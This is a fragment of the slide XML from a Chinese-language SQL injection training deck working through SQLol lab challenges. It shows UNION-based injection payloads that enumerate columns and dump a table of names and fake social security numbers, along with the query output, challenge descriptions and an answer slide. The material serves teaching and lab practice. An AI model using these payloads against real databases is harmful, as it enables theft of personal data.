              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> 查找列</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>' and 1=2 union select COLUMN_NAME from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>information_schema.COLUMNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> where TABLE_NAME='</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>';#</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; name ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> ) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>显示所有字段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>' and 1=2 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(char(32,58,32),name , </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ) from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Slobdegoob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 000-00-1112 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Herp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>Derper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 012-34-5678 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; Peter Weiner : 111-22-3333 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; Chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>MacRunfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 666-67-6776 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>SlapdeBack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>LovedeFace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> : 999-99-9999 ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1824591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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge2.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - SELECT </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - GET </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单引号过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所有用户，错误语句，查询语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1219091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注入漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479376" y="764704"/>
            <a:ext cx="8784104" cy="5731039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="704741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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>显示所有字段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>1 and 1=2 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>concat_ws</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(char(32,58,32),name , </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Slobdegoob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> : 000-00-1112 ) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Herp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Derper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> : 012-34-5678 ) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Array ( [username] =&gt; Peter Weiner : 111-22-3333 ) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Array ( [username] =&gt; Chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MacRunfast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> : 666-67-6776 ) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>SlapdeBack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>LovedeFace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> : 999-99-9999 ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1434971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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge3.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - SELECT </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单引号过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一次一行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句</a:t>
